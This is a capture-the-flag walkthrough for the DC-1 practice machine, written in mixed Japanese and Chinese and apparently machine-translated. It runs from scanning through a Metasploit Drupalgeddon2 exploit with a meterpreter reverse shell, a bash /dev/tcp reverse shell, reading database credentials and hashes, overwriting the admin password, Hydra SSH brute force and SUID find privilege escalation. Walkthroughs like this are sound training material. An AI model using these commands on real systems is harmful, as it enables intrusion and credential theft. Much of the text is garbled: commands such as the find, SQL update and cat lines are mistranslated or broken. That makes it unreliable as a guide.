DC-1ドローンの練習
最初のステップ:DC-1とカーリーの仮想マシンを構築するために、必要不可欠NATモード
[MKDIR DC-1]
[CD DC-1 /]
ステップ2:スキャンのIPアドレスドローン
[カリ-192.168.139.143 / 24]
[nmapの-sP 192.168.139.0/24 -ON nmap.sp]
[-sP / -snポートスキャンされていない]
[-ON /スキャン結果保存-oX、TXT / XML]
第三段階:情報収集ドローン
【Nmapの-A 192.168.139.145 -p 1-65535 -ON nmap.A]
[フルスキャン-A]
[指定されたポートを-p]
見出さポート80オープン
ポート20オープン-ssh
ステップ4:ログインページ80
【Http://192.168.139.145/】
情報収集のDrupal情報
1 1.php CMSを
ステップ5:スキャンのサブディレクトリ
[dirb-スキャンリスト]
[DIRB http://192.168.139.145/]
ステップ6:Webページの収集情報 - 脆弱性の外観版
[ http://192.168.139.145/UPGRADE.txt ]
[msfconsole]
[msf5 > search drupal]
[ use exploit/unix/webapp/drupal_drupalgeddon2]
[info ]
[set payload 两下tab键 ]
[ ]
[ set payload php/meterpreter/reverse_tcp ]
[show options]
[set RHOSTS 192.168.139.145]
[set LHOST 192.168.139.143 ]
[exploit ]
[成功入侵系统]
第七步:获取falg 1
[meterpreter > cat flag1.txt]
[Every good CMS needs a config file - and so do you.]
[无法使用cat ,提示查看 cms的配置文件]
【cat web.config】–查看网页的信息
[cat sites]
[ls]
[cd default]
[cat settings.php]
第八步:获取falg2
meterpreter > cat settings.php
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
),
);
[shell]
[id]
[netstat -anptl]
利用SSRF漏洞,设置到kali反弹,
kali开启监听端口
[ nc -lvvp 666]
[python -c ‘import pty;pty.spawn("/bin/bash")’ ]
[mysql -udbuser -pR0ck3t]
[exit]
[bash -i >& /dev/tcp/192.168.139.153/666 0>&1]开启反弹
第九步: 通过数据库–获得用户名和密码
[show databases;]
[use drupaldb; ]
[show tables;]
[select * from users\G]
[查出用户名和密码 ]
*************************** 2. row ***************************
uid: 1
name: admin
pass: $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR
mail: [email protected]
theme:
signature:
signature_format: NULL
created: 1550581826
access: 1550583852
login: 1550582362
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: [email protected]
data: b:0;
*************************** 3. row ***************************
uid: 2
name: Fred
pass: $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg
mail: [email protected]
theme:
signature:
signature_format: filtered_html
created: 1550581952
access: 1550582225
login: 1550582225
status: 1
timezone: Australia/Melbourne
language:
picture: 0
init: [email protected]
data: b:0;
3 rows in set (0.00 sec)
-----------------------------------
[新生成一条密文—做替换]
[cd …/]
[cd /var/www]
[php scripts/password-hash.sh 123.com]
[password: 123.com hash:
DWE/9WSI5iGV2JKCVy7UW7TGEzJ.kNBwVpLcliRiRf9vn1v/SEWq ]
登录数据库—替换密码
[mysql -udbuser -pR0ck3t]
[use drupaldb;]
[update users set pass=“
SBE / 9WSI5iGV2JKCVy7UW7TGEzJ.kNBwVpLcliRiRf9vn1v /七つの「UID = 1;
ステップ10:Webページ - ログイン管理:123.com- GET FLAG3
ステップセブンイレブン:GET FLAG4
[CAT / etc / passwdファイル]
[ハイドラはFLAG4 -l -P ... / passwd.txt 192.168.139.145 SSH -vV -f -o hydra.ssh]
[SSH [email protected]]
[LS]
[猫FLAG4]
-------------
Can you use this same method to find or access the flag in root?
Probably. But perhaps it's not that easy. Or maybe it is?
-------------
十二ステップ:flag5(右提供-root)
思考を- SUID持つが識別コマンドです
[検索/ -4000 -perm 2>を/ dev / null]を
[WCPは、 "/ binに/ SH"を検索-exec;]
[# CD /ルート]
[#のLS]
[#猫のthefinalflag.txt]は
、最後のバナーを取得します。
--------------------------------------
Well done!!!!
Hopefully you've enjoyed this and learned some new skills.
You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
#]
--------------------------------------------------